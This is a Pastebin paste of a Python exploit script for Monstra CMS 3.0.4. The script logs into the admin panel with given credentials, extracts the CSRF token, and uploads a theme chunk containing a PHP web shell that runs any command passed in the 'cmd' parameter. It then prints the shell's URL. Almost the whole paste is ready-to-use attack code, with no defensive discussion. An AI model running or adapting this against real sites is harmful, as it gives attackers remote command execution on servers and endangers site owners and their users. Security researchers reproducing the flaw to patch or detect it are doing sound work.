Advertisement
FlyFar

Monstra CMS 3.0.4 - Remote Code Execution (RCE)

Jun 8th, 2024
450
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.99 KB | Cybersecurity | 0 0
  1. # Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
  2. # Date: 05.05.2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://monstra.org/
  5. # Software Link: https://monstra.org/monstra-3.0.4.zip
  6. # Version: 3.0.4
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import random
  11. import string
  12. import time
  13. import re
  14. import sys
  15.  
  16. if len(sys.argv) < 4:
  17. print("Usage: python3 script.py <url> <username> <password>")
  18. sys.exit(1)
  19.  
  20. base_url = sys.argv[1]
  21. username = sys.argv[2]
  22. password = sys.argv[3]
  23.  
  24. session = requests.Session()
  25.  
  26. login_url = f'{base_url}/admin/index.php?id=dashboard'
  27. login_data = {
  28. 'login': username,
  29. 'password': password,
  30. 'login_submit': 'Log+In'
  31. }
  32.  
  33. filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=
  34. 5))
  35.  
  36. print("Logging in...")
  37. response = session.post(login_url, data=login_data)
  38.  
  39. if 'Dashboard' in response.text:
  40. print("Login successful")
  41. else:
  42. print("Login failed")
  43. exit()
  44.  
  45. time.sleep(3)
  46.  
  47. edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
  48. response = session.get(edit_url) # CSRF token bulmak için edit sayfasına
  49. erişim
  50.  
  51. token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="
  52. (.*?)"', response.text)
  53. if token_search:
  54. token = token_search.group(1)
  55. else:
  56. print("CSRF token could not be found.")
  57. exit()
  58.  
  59. content = '''
  60. <html>
  61. <body>
  62. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  63. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  64. <input type="SUBMIT" value="Execute">
  65. </form>
  66. <pre>
  67. <?php
  68. if(isset($_GET['cmd']))
  69. {
  70. system($_GET['cmd']);
  71. }
  72. ?>
  73. </pre>
  74. </body>
  75. </html>
  76. '''
  77.  
  78. edit_data = {
  79. 'csrf': token,
  80. 'name': filename,
  81. 'content': content,
  82. 'add_file': 'Save'
  83. }
  84.  
  85. print("Preparing shell...")
  86. response = session.post(edit_url, data=edit_data)
  87. time.sleep(3)
  88.  
  89. if response.status_code == 200:
  90. print(f"Your shell is ready: {base_url}/public/themes/default/{filename}
  91. .chunk.php")
  92. else:
  93. print("Failed to prepare shell.")
  94.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement